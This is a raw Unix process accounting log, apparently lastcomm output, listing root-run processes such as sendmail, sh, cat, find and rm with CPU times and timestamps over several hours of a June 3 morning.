__ 0.03 secs Sat Jun 3 03:31 13689 sendmail SF root __ 0.05 secs Sat Jun 3 03:32 13681 cat S root __ 0.01 secs Sat Jun 3 03:32 13680 sendmail SF root __ 0.01 secs Sat Jun 3 03:32 13679 sendmail S root __ 0.22 secs Sat Jun 3 03:32 13678 sh S root __ 0.01 secs Sat Jun 3 03:32 13677 sendmail SF root __ 0.02 secs Sat Jun 3 03:32 13676 sendmail SF root __ 0.05 secs Sat Jun 3 03:32 13675 sendmail SF root __ 0.03 secs Sat Jun 3 03:32 13673 sendmail SF root __ 0.05 secs Sat Jun 3 03:32 13672 sendmail SF root __ 0.05 secs Sat Jun 3 03:32 13671 sendmail SF root __ 0.03 secs Sat Jun 3 03:32 13669 sendmail SF root __ 0.06 secs Sat Jun 3 03:32 13658 sendmail SF root __ 0.05 secs Sat Jun 3 03:33 13656 sendmail SF root __ 0.05 secs Sat Jun 3 03:33 13655 sendmail SF root __ 0.03 secs Sat Jun 3 03:32 13654 sendmail SF root __ 0.05 secs Sat Jun 3 03:33 13653 sendmail SF root __ 0.05 secs Sat Jun 3 03:33 13651 sendmail SF root __ 0.06 secs Sat Jun 3 03:34 13649 sendmail SF root __ 0.06 secs Sat Jun 3 03:34 13648 sendmail SF root __ 0.03 secs Sat Jun 3 03:33 13647 sendmail SF root __ 0.03 secs Sat Jun 3 03:33 13575 telnetd S root __ 0.73 secs Sat Jun 3 01:20 13546 cat S root __ 0.01 secs Sat Jun 3 03:37 13545 sendmail SF root __ 0.01 secs Sat Jun 3 03:37 13544 sendmail S root __ 0.22 secs Sat Jun 3 03:37 13543 sh S root __ 0.01 secs Sat Jun 3 03:37 13542 sendmail SF root __ 0.02 secs Sat Jun 3 03:37 13435 sendmail SF root __ 0.05 secs Sat Jun 3 03:41 13433 sendmail SF root __ 0.05 secs Sat Jun 3 03:41 13432 sendmail SF root __ 0.05 secs Sat Jun 3 03:41 13426 sendmail SF root __ 0.02 secs Sat Jun 3 03:41 13414 cat S root __ 0.01 secs Sat Jun 3 03:42 13413 sendmail SF root __ 0.01 secs Sat Jun 3 03:42 13412 sendmail S root __ 0.22 secs Sat Jun 3 03:42 13411 sh S root __ 0.01 secs Sat Jun 3 03:42 13410 sendmail SF root __ 0.01 secs Sat Jun 3 03:42 13399 sendmail SF root __ 0.05 secs Sat Jun 3 03:41 13398 sendmail SF root __ 0.05 secs Sat Jun 3 03:43 13396 sendmail SF root __ 0.05 secs Sat Jun 3 03:43 13395 sendmail SF root __ 0.02 secs Sat Jun 3 03:42 13372 sendmail SF root __ 0.05 secs Sat Jun 3 03:44 13371 sendmail SF root __ 0.03 secs Sat Jun 3 03:44 13356 sendmail SF root __ 0.06 secs Sat Jun 3 03:45 13347 sendmail SF root __ 0.05 secs Sat Jun 3 03:45 13346 sendmail SF root __ 0.03 secs Sat Jun 3 03:45 13344 sendmail SF root __ 0.05 secs Sat Jun 3 03:45 13342 sendmail SF root __ 0.05 secs Sat Jun 3 03:45 13340 sendmail SF root __ 0.05 secs Sat Jun 3 03:45 13336 sendmail SF root __ 0.03 secs Sat Jun 3 03:44 13308 sendmail SF root __ 0.02 secs Sat Jun 3 03:46 13278 cat S root __ 0.01 secs Sat Jun 3 03:47 13275 sendmail SF root __ 0.01 secs Sat Jun 3 03:47 13274 sendmail S root __ 0.22 secs Sat Jun 3 03:47 13273 sh S root __ 0.01 secs Sat Jun 3 03:47 13272 sendmail SF root __ 0.02 secs Sat Jun 3 03:47 13269 sendmail SF root __ 0.05 secs Sat Jun 3 03:47 13265 sendmail SF root __ 0.05 secs Sat Jun 3 03:47 13264 sendmail SF root __ 0.03 secs Sat Jun 3 03:46 13259 sendmail SF root __ 0.05 secs Sat Jun 3 03:47 13257 sendmail SF root __ 0.05 secs Sat Jun 3 03:48 13246 sendmail SF root __ 0.05 secs Sat Jun 3 03:49 13245 sendmail SF root __ 0.02 secs Sat Jun 3 03:49 13243 sendmail SF root __ 0.05 secs Sat Jun 3 03:49 13161 sendmail SF root __ 0.05 secs Sat Jun 3 03:47 13145 cat S root __ 0.01 secs Sat Jun 3 03:52 13144 sendmail SF root __ 0.01 secs Sat Jun 3 03:52 13143 sendmail S root __ 0.20 secs Sat Jun 3 03:52 13142 sh S root __ 0.01 secs Sat Jun 3 03:52 13141 sendmail SF root __ 0.02 secs Sat Jun 3 03:52 13135 sendmail SF root __ 0.02 secs Sat Jun 3 03:47 13124 sendmail SF root __ 0.05 secs Sat Jun 3 03:53 13122 sendmail SF root __ 0.06 secs Sat Jun 3 03:53 13111 sendmail SF root __ 0.02 secs Sat Jun 3 03:54 13088 sendmail SF root __ 0.06 secs Sat Jun 3 03:54 13087 sendmail SF root __ 0.03 secs Sat Jun 3 03:54 13085 sendmail SF root __ 0.09 secs Sat Jun 3 03:55 13040 sendmail SF root __ 0.03 secs Sat Jun 3 03:52 13025 cat S root __ 0.01 secs Sat Jun 3 03:57 13024 sendmail SF root __ 0.01 secs Sat Jun 3 03:57 13023 sendmail S root __ 0.20 secs Sat Jun 3 03:57 13022 sh S root __ 0.01 secs Sat Jun 3 03:57 13021 sendmail SF root __ 0.02 secs Sat Jun 3 03:57 13004 sendmail SF root __ 0.05 secs Sat Jun 3 03:57 13003 sendmail SF root __ 0.03 secs Sat Jun 3 03:57 13001 sendmail SF root __ 0.05 secs Sat Jun 3 03:57 13000 sendmail SF root __ 0.05 secs Sat Jun 3 03:57 12999 sendmail SF root __ 0.02 secs Sat Jun 3 03:57 12997 sendmail SF root __ 0.06 secs Sat Jun 3 03:57 12981 sendmail SF root __ 0.05 secs Sat Jun 3 03:56 12970 sendmail SF root __ 0.06 secs Sat Jun 3 03:58 12969 sendmail SF root __ 0.03 secs Sat Jun 3 03:58 12967 sendmail SF root __ 0.06 secs Sat Jun 3 03:58 12936 sendmail SF root __ 0.05 secs Sat Jun 3 03:59 12928 sendmail SF root __ 0.05 secs Sat Jun 3 04:00 12927 sendmail SF root __ 0.05 secs Sat Jun 3 03:59 12877 cat S root __ 0.02 secs Sat Jun 3 04:02 12876 rush_p S root __ 0.05 secs Sat Jun 3 04:02 12875 cat S root __ 0.01 secs Sat Jun 3 04:02 12874 rush_s S root __ 0.03 secs Sat Jun 3 04:02 12865 cat S root __ 0.01 secs Sat Jun 3 04:02 12863 sendmail SF root __ 0.01 secs Sat Jun 3 04:02 12862 sendmail S root __ 0.22 secs Sat Jun 3 04:02 12861 sh S root __ 0.01 secs Sat Jun 3 04:02 12860 sendmail SF root __ 0.02 secs Sat Jun 3 04:02 12844 sendmail SF root __ 0.05 secs Sat Jun 3 04:02 12843 sendmail SF root __ 0.05 secs Sat Jun 3 04:02 12837 sendmail SF root __ 0.08 secs Sat Jun 3 04:02 12836 sendmail SF root __ 0.05 secs Sat Jun 3 04:02 12834 sendmail SF root __ 0.05 secs Sat Jun 3 04:02 12833 sendmail SF root __ 0.02 secs Sat Jun 3 04:02 12822 sendmail SF root __ 0.05 secs Sat Jun 3 04:03 12819 sendmail SF root __ 0.05 secs Sat Jun 3 04:04 12818 sendmail SF root __ 0.03 secs Sat Jun 3 04:03 12740 cat S root __ 0.01 secs Sat Jun 3 04:07 12739 sendmail SF root __ 0.01 secs Sat Jun 3 04:07 12738 sendmail S root __ 0.22 secs Sat Jun 3 04:07 12737 sh S root __ 0.01 secs Sat Jun 3 04:07 12736 sendmail SF root __ 0.02 secs Sat Jun 3 04:07 12702 sendmail SF root __ 0.05 secs Sat Jun 3 04:08 12701 sendmail SF root __ 0.03 secs Sat Jun 3 04:08 12699 sendmail SF root __ 0.05 secs Sat Jun 3 04:09 12609 cat S root __ 0.01 secs Sat Jun 3 04:12 12605 sendmail SF root __ 0.01 secs Sat Jun 3 04:12 12604 sendmail S root __ 0.22 secs Sat Jun 3 04:12 12603 sh S root __ 0.01 secs Sat Jun 3 04:12 12602 sendmail SF root __ 0.02 secs Sat Jun 3 04:12 12591 sendmail SF root __ 0.06 secs Sat Jun 3 04:11 12553 find S root __ 0.01 secs Sat Jun 3 04:15 12552 sh S root __ 0.02 secs Sat Jun 3 04:15 12487 cat S root __ 0.01 secs Sat Jun 3 04:17 12486 sendmail SF root __ 0.01 secs Sat Jun 3 04:17 12485 sendmail S root __ 0.22 secs Sat Jun 3 04:17 12484 sh S root __ 0.01 secs Sat Jun 3 04:17 12481 sendmail SF root __ 0.01 secs Sat Jun 3 04:17 12429 rm S root __ 0.01 secs Sat Jun 3 04:20 12423 rm S root __ 0.01 secs Sat Jun 3 04:20 12422 rm S root __ 0.01 secs Sat Jun 3 04:20 12420 rm S root __ 0.01 secs Sat Jun 3 04:20 12419 rm S root __ 0.01 secs Sat Jun 3 04:20 12418 rm S root __ 0.02 secs Sat Jun 3 04:20 12417 rm S root __ 0.01 secs Sat Jun 3 04:20 12416 find S root __ 0.03 secs Sat Jun 3 04:20 12415 sh S root __ 0.02 secs Sat Jun 3 04:20 12414 cat S root __ 0.01 secs Sat Jun 3 04:20 12408 sendmail SF root __ 0.01 secs Sat Jun 3 04:20 12407 sendmail S root __ 0.23 secs Sat Jun 3 04:20 12406 sh S root __ 0.01 secs Sat Jun 3 04:20 12404 sendmail SF root __ 0.02 secs Sat Jun 3 04:20 12403 sendmail SF root __ 0.05 secs Sat Jun 3 04:19 12401 sendmail SF root __ 0.08 secs Sat Jun 3 04:20 12400 sendmail SF root __ 0.05 secs Sat Jun 3 04:19 12392 sendmail SF root __ 0.06 secs Sat Jun 3 04:20 12391 sendmail SF root __ 0.03 secs Sat Jun 3 04:19 12389 sendmail SF root __ 0.03 secs Sat Jun 3 04:19 12351 sendmail SF root __ 0.05 secs Sat Jun 3 04:21 12350 sendmail SF root __ 0.03 secs Sat Jun 3 04:21 12345 sendmail SF root __ 0.05 secs Sat Jun 3 04:21 12320 cat S root __ 0.01 secs Sat Jun 3 04:22 12319 sendmail SF root __ 0.01 secs Sat Jun 3 04:22 12318 sendmail S root __ 0.20 secs Sat Jun 3 04:22 12317 sh S root __ 0.01 secs Sat Jun 3 04:22 12316 sendmail SF root __ 0.02 secs Sat Jun 3 04:22 12289 sendmail SF root __ 0.06 secs Sat Jun 3 04:23 12288 sendmail SF root __ 0.03 secs Sat Jun 3 04:23 12287 procmail S root __ 0.08 secs Sat Jun 3 04:23 12285 sendmail SF root __ 0.05 secs Sat Jun 3 04:23 12284 sendmail SF root __ 0.05 secs Sat Jun 3 04:23 12282 sendmail SF root __ 0.06 secs Sat Jun 3 04:23 12281 sendmail SF root __ 0.02 secs Sat Jun 3 04:23 12175 cat S root __ 0.01 secs Sat Jun 3 04:27 12174 sendmail SF root __ 0.01 secs Sat Jun 3 04:27 12173 sendmail S root __ 0.20 secs Sat Jun 3 04:27 12172 sh S root __ 0.01 secs Sat Jun 3 04:27 12169 sendmail SF root __ 0.01 secs Sat Jun 3 04:27 12149 sendmail SF root __ 0.05 secs Sat Jun 3 04:26 12133 sendmail SF root __ 0.05 secs Sat Jun 3 04:29 12131 sendmail SF root __ 0.05 secs Sat Jun 3 04:29 12130 sendmail SF root __ 0.03 secs Sat Jun 3 04:28 12129 sendmail SF root __ 0.05 secs Sat Jun 3 04:29 12127 sendmail SF root __ 0.06 secs Sat Jun 3 04:29 12114 sendmail SF root __ 0.03 secs Sat Jun 3 04:29 12107 rm S root __ 0.01 secs Sat Jun 3 04:30 12106 find S root __ 0.01 secs Sat Jun 3 04:30 12105 sh S root __ 0.02 secs Sat Jun 3 04:30 12062 sendmail SF root __ 0.05 secs Sat Jun 3 04:30 12060 sendmail SF root __ 0.05 secs Sat Jun 3 04:30 12059 sendmail SF root __ 0.03 secs Sat Jun 3 04:30 12050 sendmail SF root __ 0.03 secs Sat Jun 3 04:31 12049 sendmail SF root __ 0.03 secs Sat Jun 3 04:30 12048 sendmail SF root __ 0.05 secs Sat Jun 3 04:31 12047 sendmail SF root __ 0.03 secs Sat Jun 3 04:30 12038 sendmail SF root __ 0.06 secs Sat Jun 3 04:31 12037 sendmail SF root __ 0.05 secs Sat Jun 3 04:31 11997 sendmail SF root __ 0.06 secs Sat Jun 3 04:31 11996 sendmail SF root __ 0.06 secs Sat Jun 3 04:31 11993 sendmail SF root __ 0.06 secs Sat Jun 3 04:32 11992 sendmail SF root __ 0.06 secs Sat Jun 3 04:32 11991 sendmail SF root __ 0.03 secs Sat Jun 3 04:31 11990 sendmail SF root __ 0.03 secs Sat Jun 3 04:31 11972 cat S root __ 0.01 secs Sat Jun 3 04:32 11971 sendmail SF root __ 0.01 secs Sat Jun 3 04:32 11970 sendmail S root __ 0.20 secs Sat Jun 3 04:32 11969 sh S root __ 0.01 secs Sat Jun 3 04:32 11968 sendmail SF root __ 0.01 secs Sat Jun 3 04:32 11952 sendmail SF root __ 0.06 secs Sat Jun 3 04:34 11950 sendmail SF root __ 0.08 secs Sat Jun 3 04:34 11944 sendmail SF root __ 0.03 secs Sat Jun 3 04:34 11909 sendmail SF root __ 0.05 secs Sat Jun 3 04:35 11907 sendmail SF root __ 0.05 secs Sat Jun 3 04:35 11906 sendmail SF root __ 0.03 secs Sat Jun 3 04:35 11890 sendmail SF root __ 0.05 secs Sat Jun 3 04:36 11888 sendmail SF root __ 0.06 secs Sat Jun 3 04:36 11887 sendmail SF root __ 0.03 secs Sat Jun 3 04:36 11866 cat S root __ 0.01 secs Sat Jun 3 04:37 11865 sendmail SF root __ 0.01 secs Sat Jun 3 04:37 11864 sendmail S root __ 0.22 secs Sat Jun 3 04:37 11863 sh S root __ 0.01 secs Sat Jun 3 04:37 11862 sendmail SF root __ 0.01 secs Sat Jun 3 04:37 11844 sendmail SF root __ 0.05 secs Sat Jun 3 04:38 11837 sendmail SF root __ 0.05 secs Sat Jun 3 04:38 11836 sendmail SF root __ 0.03 secs Sat Jun 3 04:38 11826 sendmail SF root __ 0.06 secs Sat Jun 3 04:38 11824 sendmail SF root __ 0.06 secs Sat Jun 3 04:38 11822 sendmail SF root __ 0.02 secs Sat Jun 3 04:38 11811 sendmail SF root __ 0.05 secs Sat Jun 3 04:39 11809 sendmail SF root __ 0.05 secs Sat Jun 3 04:39 11808 sendmail SF root __ 0.02 secs Sat Jun 3 04:38 11743 sendmail SF root __ 0.02 secs Sat Jun 3 04:40 11721 cat S root __ 0.01 secs Sat Jun 3 04:42 11720 sendmail SF root __ 0.01 secs Sat Jun 3 04:42 11719 sendmail S root __ 0.22 secs Sat Jun 3 04:42 11718 sh S root __ 0.01 secs Sat Jun 3 04:42 11717 sendmail SF root __ 0.01 secs Sat Jun 3 04:42 11716 sendmail SF root __ 0.05 secs Sat Jun 3 04:42 11714 sendmail SF root __ 0.05 secs Sat Jun 3 04:42 11713 sendmail SF root __ 0.03 secs Sat Jun 3 04:42 11687 sendmail SF root __ 0.05 secs Sat Jun 3 04:41 11666 sendmail SF root __ 0.05 secs Sat Jun 3 04:44 11665 sendmail SF root __ 0.03 secs Sat Jun 3 04:44 11656 sendmail SF root __ 0.06 secs Sat Jun 3 04:44 11623 sendmail SF root __ 0.05 secs Sat Jun 3 04:46 11622 sendmail SF root __ 0.03 secs Sat Jun 3 04:45 11608 sendmail SF root __ 0.08 secs Sat Jun 3 04:46 11580 cat S root __ 0.01 secs Sat Jun 3 04:47 11579 sendmail SF root __ 0.01 secs Sat Jun 3 04:47 11578 sendmail S root __ 0.20 secs Sat Jun 3 04:47 11577 sh S root __ 0.01 secs Sat Jun 3 04:47 11576 sendmail SF root __ 0.01 secs Sat Jun 3 04:47 11539 telnetd S root __ 0.47 secs Sat Jun 3 04:13 11446 sendmail SF root __ 0.08 secs Sat Jun 3 04:51 11445 sendmail SF root __ 0.03 secs Sat Jun 3 04:51 11443 sendmail SF root __ 0.05 secs Sat Jun 3 04:51 11440 sendmail SF root __ 0.06 secs Sat Jun 3 04:51 11439 sendmail SF root __ 0.03 secs Sat Jun 3 04:50 11438 sendmail SF root __ 0.16 secs Sat Jun 3 04:51 11428 sendmail SF root __ 0.05 secs Sat Jun 3 04:51 11426 sendmail SF root __ 0.05 secs Sat Jun 3 04:52 11425 sendmail SF root __ 0.03 secs Sat Jun 3 04:51 11412 cat S root __ 0.01 secs Sat Jun 3 04:52 11411 sendmail SF root __ 0.01 secs Sat Jun 3 04:52 11410 sendmail S root __ 0.22 secs Sat Jun 3 04:52 11409 sh S root __ 0.01 secs Sat Jun 3 04:52 11408 sendmail SF root __ 0.02 secs Sat Jun 3 04:52 11371 sendmail SF root __ 0.03 secs Sat Jun 3 04:55 11366 sendmail SF root __ 0.03 secs Sat Jun 3 04:54 11364 sendmail SF root __ 0.05 secs Sat Jun 3 04:55 11324 sendmail SF root __ 0.05 secs Sat Jun 3 04:56 11322 sendmail SF root __ 0.08 secs Sat Jun 3 04:56 11318 sendmail SF root __ 0.03 secs Sat Jun 3 04:55 11299 cat S root __ 0.01 secs Sat Jun 3 04:57 11297 sendmail SF root __ 0.01 secs Sat Jun 3 04:57 11296 sendmail S root __ 0.20 secs Sat Jun 3 04:57 11295 sh S root __ 0.01 secs Sat Jun 3 04:57 11294 sendmail SF root __ 0.02 secs Sat Jun 3 04:57 11285 sendmail SF root __ 0.05 secs Sat Jun 3 04:57 11284 sendmail SF root __ 0.03 secs Sat Jun 3 04:57 11282 sendmail SF root __ 0.05 secs Sat Jun 3 04:57 11276 sendmail SF root __ 0.05 secs Sat Jun 3 04:56 11255 find S root __ 0.01 secs Sat Jun 3 05:00 11254 sh S root __ 0.02 secs Sat Jun 3 05:00 11206 sendmail SF root __ 0.05 secs Sat Jun 3 05:00 11204 sendmail SF root __ 0.06 secs Sat Jun 3 05:01 11203 sendmail SF root __ 0.05 secs Sat Jun 3 05:00 11140 cat S root __ 0.01 secs Sat Jun 3 05:02 11139 sendmail SF root __ 0.01 secs Sat Jun 3 05:02 11138 sendmail S root __ 0.22 secs Sat Jun 3 05:02 11137 sh S root __ 0.01 secs Sat Jun 3 05:02 11136 sendmail SF root __ 0.01 secs Sat Jun 3 05:02 11130 sendmail SF root __ 0.05 secs Sat Jun 3 05:02 11129 sendmail SF root __ 0.02 secs Sat Jun 3 05:02 11127 sendmail SF root __ 0.05 secs Sat Jun 3 05:02 11126 sendmail SF root __ 0.05 secs Sat Jun 3 05:03 11124 sendmail SF root __ 0.06 secs Sat Jun 3 05:03 11123 sendmail SF root __ 0.02 secs Sat Jun 3 05:03 11076 sendmail SF root __ 0.06 secs Sat Jun 3 05:04 11069 sendmail SF root __ 0.08 secs Sat Jun 3 05:05 11065 sendmail SF root __ 0.03 secs Sat Jun 3 05:04 11019 cat S root __ 0.01 secs Sat Jun 3 05:07 11018 sendmail SF root __ 0.01 secs Sat Jun 3 05:07 11017 sendmail S root __ 0.22 secs Sat Jun 3 05:07 11016 sh S root __ 0.01 secs Sat Jun 3 05:07 11015 sendmail SF root __ 0.02 secs Sat Jun 3 05:07 10932 sendmail SF root __ 0.06 secs Sat Jun 3 05:10 10927 sendmail SF root __ 0.05 secs Sat Jun 3 05:10 10926 sendmail SF root __ 0.06 secs Sat Jun 3 05:10 10925 sendmail SF root __ 0.08 secs Sat Jun 3 05:10 10923 sendmail SF root __ 0.06 secs Sat Jun 3 05:10 10922 sendmail SF root __ 0.05 secs Sat Jun 3 05:10 10902 sendmail SF root __ 0.06 secs Sat Jun 3 05:11 10900 sendmail SF root __ 0.06 secs Sat Jun 3 05:11 10899 sendmail SF root __ 0.03 secs Sat Jun 3 05:11 10881 sendmail SF root __ 0.05 secs Sat Jun 3 05:11 10879 sendmail SF root __ 0.06 secs Sat Jun 3 05:12 10878 sendmail SF root __ 0.02 secs Sat Jun 3 05:11 10865 cat S root __ 0.01 secs Sat Jun 3 05:12 10864 sendmail SF root __ 0.01 secs Sat Jun 3 05:12 10863 sendmail S root __ 0.22 secs Sat Jun 3 05:12 10862 sh S root __ 0.01 secs Sat Jun 3 05:12 10861 sendmail SF root __ 0.01 secs Sat Jun 3 05:12 10845 sendmail SF root __ 0.05 secs Sat Jun 3 05:11 10844 sendmail SF root __ 0.05 secs Sat Jun 3 05:13 10840 sendmail SF root __ 0.05 secs Sat Jun 3 05:13 10836 sendmail SF root __ 0.03 secs Sat Jun 3 05:13 10822 sendmail SF root __ 0.05 secs Sat Jun 3 05:14 10820 sendmail SF root __ 0.06 secs Sat Jun 3 05:14 10772 sendmail SF root __ 0.05 secs Sat Jun 3 05:17 10771 sendmail SF root __ 0.05 secs Sat Jun 3 05:17 10768 sendmail SF root __ 0.03 secs Sat Jun 3 05:17 10767 sendmail SF root __ 0.05 secs Sat Jun 3 05:17 10766 sendmail SF root __ 0.08 secs Sat Jun 3 05:17 10765 sendmail SF root __ 0.08 secs Sat Jun 3 05:17 10752 cat S root __ 0.01 secs Sat Jun 3 05:17 10751 sendmail SF root __ 0.01 secs Sat Jun 3 05:17 10750 sendmail S root __ 0.22 secs Sat Jun 3 05:17 10749 sh S root __ 0.01 secs Sat Jun 3 05:17 10748 sendmail SF root __ 0.01 secs Sat Jun 3 05:17 10736 sendmail SF root __ 0.05 secs Sat Jun 3 05:17 10734 sendmail SF root __ 0.05 secs Sat Jun 3 05:17 10730 sendmail SF root __ 0.02 secs Sat Jun 3 05:17 10720 sendmail SF root __ 0.03 secs Sat Jun 3 05:13 10674 sendmail SF root __ 0.05 secs Sat Jun 3 05:20 10668 sendmail SF root __ 0.06 secs Sat Jun 3 05:20 10667 sendmail SF root __ 0.05 secs Sat Jun 3 05:20 10659 sendmail SF root __ 0.08 secs Sat Jun 3 05:20 10658 sendmail SF root __ 0.02 secs Sat Jun 3 05:20 10653 sendmail SF root __ 0.08 secs Sat Jun 3 05:20 10612 cat S root __ 0.01 secs Sat Jun 3 05:22 10611 sendmail SF root __ 0.01 secs Sat Jun 3 05:22 10610 sendmail S root __ 0.22 secs Sat Jun 3 05:22 10609 sh S root __ 0.01 secs Sat Jun 3 05:22 10608 sendmail SF root __ 0.02 secs Sat Jun 3 05:22 10522 sendmail SF root __ 0.05 secs Sat Jun 3 05:25 10521 sendmail SF root __ 0.05 secs Sat Jun 3 05:25 10519 sendmail SF root __ 0.06 secs Sat Jun 3 05:25 10460 cat S root __ 0.01 secs Sat Jun 3 05:27 10459 sendmail SF root __ 0.01 secs Sat Jun 3 05:27 10458 sendmail S root __ 0.22 secs Sat Jun 3 05:27 10457 sh S root __ 0.01 secs Sat Jun 3 05:27 10455 sendmail SF root __ 0.01 secs Sat Jun 3 05:27 10434 sendmail SF root __ 0.05 secs Sat Jun 3 05:26 10429 sendmail SF root __ 0.05 secs Sat Jun 3 05:28 10428 sendmail SF root __ 0.03 secs Sat Jun 3 05:28 10426 sendmail SF root __ 0.06 secs Sat Jun 3 05:28 10335 cat S root __ 0.01 secs Sat Jun 3 05:32 10334 sendmail SF root __ 0.01 secs Sat Jun 3 05:32 10333 sendmail S root __ 0.20 secs Sat Jun 3 05:32 10332 sh S root __ 0.01 secs Sat Jun 3 05:32 10331 sendmail SF root __ 0.02 secs Sat Jun 3 05:32 10274 sendmail SF root __ 0.05 secs Sat Jun 3 05:35 10273 sendmail SF root __ 0.03 secs Sat Jun 3 05:34 10271 sendmail SF root __ 0.06 secs Sat Jun 3 05:35 10177 cat S root __ 0.01 secs Sat Jun 3 05:37 10176 sendmail SF root __ 0.01 secs Sat Jun 3 05:37 10175 sendmail S root __ 0.20 secs Sat Jun 3 05:37 10174 sh S root __ 0.01 secs Sat Jun 3 05:37 10173 sendmail SF root __ 0.01 secs Sat Jun 3 05:37 10049 sendmail SF root __ 0.03 secs Sat Jun 3 05:41 10047 sendmail SF root __ 0.05 secs Sat Jun 3 05:41 10046 sendmail SF root __ 0.03 secs Sat Jun 3 05:41 10035 cat S root __ 0.01 secs Sat Jun 3 05:42 10034 sendmail SF root __ 0.01 secs Sat Jun 3 05:42 10033 sendmail S root __ 0.20 secs Sat Jun 3 05:42 10032 sh S root __ 0.01 secs Sat Jun 3 05:42 10031 sendmail SF root __ 0.01 secs Sat Jun 3 05:42 10016 sendmail SF root __ 0.05 secs Sat Jun 3 05:42 10014 sendmail SF root __ 0.06 secs Sat Jun 3 05:42 10013 sendmail SF root __ 0.03 secs Sat Jun 3 05:42 10011 sendmail SF root __ 0.03 secs Sat Jun 3 05:42 10009 sendmail SF root __ 0.05 secs Sat Jun 3 05:43 10008 sendmail SF root __ 0.02 secs Sat Jun 3 05:42 10002 sendmail SF root __ 0.06 secs Sat Jun 3 05:41 9972 sendmail SF root __ 0.05 secs Sat Jun 3 05:44 9971 sendmail SF root __ 0.03 secs Sat Jun 3 05:44 9969 sendmail SF root __ 0.05 secs Sat Jun 3 05:44 9888 cat S root __ 0.01 secs Sat Jun 3 05:47 9887 sendmail SF root __ 0.01 secs Sat Jun 3 05:47 9886 sendmail S root __ 0.22 secs Sat Jun 3 05:47 9885 sh S root __ 0.01 secs Sat Jun 3 05:47 9884 sendmail SF root __ 0.01 secs Sat Jun 3 05:47 9812 sendmail SF root __ 0.08 secs Sat Jun 3 05:50 9810 sendmail SF root __ 0.09 secs Sat Jun 3 05:50 9809 sendmail SF root __ 0.03 secs Sat Jun 3 05:49 9745 cat S root __ 0.01 secs Sat Jun 3 05:52 9744 sendmail SF root __ 0.01 secs Sat Jun 3 05:52 9743 sendmail S root __ 0.22 secs Sat Jun 3 05:52 9742 sh S root __ 0.01 secs Sat Jun 3 05:52 9741 sendmail SF root __ 0.01 secs Sat Jun 3 05:52 9735 sendmail SF root __ 0.05 secs Sat Jun 3 05:51 9733 sendmail SF root __ 0.08 secs Sat Jun 3 05:52 9731 sendmail SF root __ 0.03 secs Sat Jun 3 05:51 9730 sendmail SF root __ 0.05 secs Sat Jun 3 05:53 9728 sendmail SF root __ 0.06 secs Sat Jun 3 05:53 9727 sendmail SF root __ 0.02 secs Sat Jun 3 05:52 9648 cat S root __ 0.01 secs Sat Jun 3 05:57 9647 sendmail SF root __ 0.01 secs Sat Jun 3 05:57 9646 sendmail S root __ 0.22 secs Sat Jun 3 05:57 9645 sh S root __ 0.01 secs Sat Jun 3 05:57 9644 sendmail SF root __ 0.01 secs Sat Jun 3 05:57 9629 sendmail SF root __ 0.05 secs Sat Jun 3 05:57 9628 sendmail SF root __ 0.03 secs Sat Jun 3 05:57 9626 sendmail SF root __ 0.05 secs Sat Jun 3 05:57 9607 sendmail SF root __ 0.06 secs Sat Jun 3 05:56 9572 sendmail SF root __ 0.05 secs Sat Jun 3 05:59 9570 sendmail SF root __ 0.06 secs Sat Jun 3 06:00 9569 sendmail SF root __ 0.03 secs Sat Jun 3 05:59 9491 cat S root __ 0.01 secs Sat Jun 3 06:02 9490 sendmail SF root __ 0.01 secs Sat Jun 3 06:02 9489 sendmail S root __ 0.22 secs Sat Jun 3 06:02 9488 sh S root __ 0.01 secs Sat Jun 3 06:02 9487 sendmail SF root __ 0.01 secs Sat Jun 3 06:02 9471 sendmail SF root __ 0.05 secs Sat Jun 3 06:03 9469 sendmail SF root __ 0.05 secs Sat Jun 3 06:03 9468 sendmail SF root __ 0.03 secs Sat Jun 3 06:03 9438 sendmail SF root __ 0.06 secs Sat Jun 3 06:05 9436 sendmail SF root __ 0.06 secs Sat Jun 3 06:05 9435 sendmail SF root __ 0.03 secs Sat Jun 3 06:04 9383 cat S root __ 0.01 secs Sat Jun 3 06:07 9382 sendmail SF root __ 0.01 secs Sat Jun 3 06:07 9381 sendmail S root __ 0.22 secs Sat Jun 3 06:07 9380 sh S root __ 0.01 secs Sat Jun 3 06:07 9378 sendmail SF root __ 0.01 secs Sat Jun 3 06:07 9366 sendmail SF root __ 0.05 secs Sat Jun 3 06:08 9364 sendmail SF root __ 0.06 secs Sat Jun 3 06:08 9332 sendmail SF root __ 0.05 secs Sat Jun 3 06:09 9331 sendmail SF root __ 0.03 secs Sat Jun 3 06:09 9324 sendmail SF root __ 0.05 secs Sat Jun 3 06:09 9257 cat S root __ 0.01 secs Sat Jun 3 06:12 9256 sendmail SF root __ 0.01 secs Sat Jun 3 06:12 9255 sendmail S root __ 0.20 secs Sat Jun 3 06:12 9254 sh S root __ 0.01 secs Sat Jun 3 06:12 9253 sendmail SF root __ 0.01 secs Sat Jun 3 06:12 9247 sendmail SF root __ 0.09 secs Sat Jun 3 06:12 9246 sendmail SF root __ 0.03 secs Sat Jun 3 06:12 9244 sendmail SF root __ 0.09 secs Sat Jun 3 06:12 9223 sendmail SF root __ 0.05 secs Sat Jun 3 06:11 9216 sendmail SF root __ 0.03 secs Sat Jun 3 06:13 9214 sendmail SF root __ 0.06 secs Sat Jun 3 06:13 9213 sendmail SF root __ 0.05 secs Sat Jun 3 06:13 9211 sendmail SF root __ 0.06 secs Sat Jun 3 06:13 9210 sendmail SF root __ 0.05 secs Sat Jun 3 06:13 9207 sendmail SF root __ 0.06 secs Sat Jun 3 06:13 9206 sendmail SF root __ 0.05 secs Sat Jun 3 06:13 9166 sendmail SF root __ 0.03 secs Sat Jun 3 06:07 9110 cat S root __ 0.01 secs Sat Jun 3 06:17 9109 sendmail SF root __ 0.01 secs Sat Jun 3 06:17 9108 sendmail S root __ 0.22 secs Sat Jun 3 06:17 9107 sh S root __ 0.01 secs Sat Jun 3 06:17 9106 sendmail SF root __ 0.01 secs Sat Jun 3 06:17 9084 sendmail SF root __ 0.08 secs Sat Jun 3 06:19 9083 sendmail SF root __ 0.02 secs Sat Jun 3 06:19 9080 sendmail SF root __ 0.09 secs Sat Jun 3 06:19 9021 sendmail SF root __ 0.05 secs Sat Jun 3 06:20 9019 sendmail SF root __ 0.06 secs Sat Jun 3 06:20 9018 sendmail SF root __ 0.05 secs Sat Jun 3 06:20 8977 cat S root __ 0.01 secs Sat Jun 3 06:22 8976 sendmail SF root __ 0.01 secs Sat Jun 3 06:22 8975 sendmail S root __ 0.22 secs Sat Jun 3 06:22 8974 sh S root __ 0.01 secs Sat Jun 3 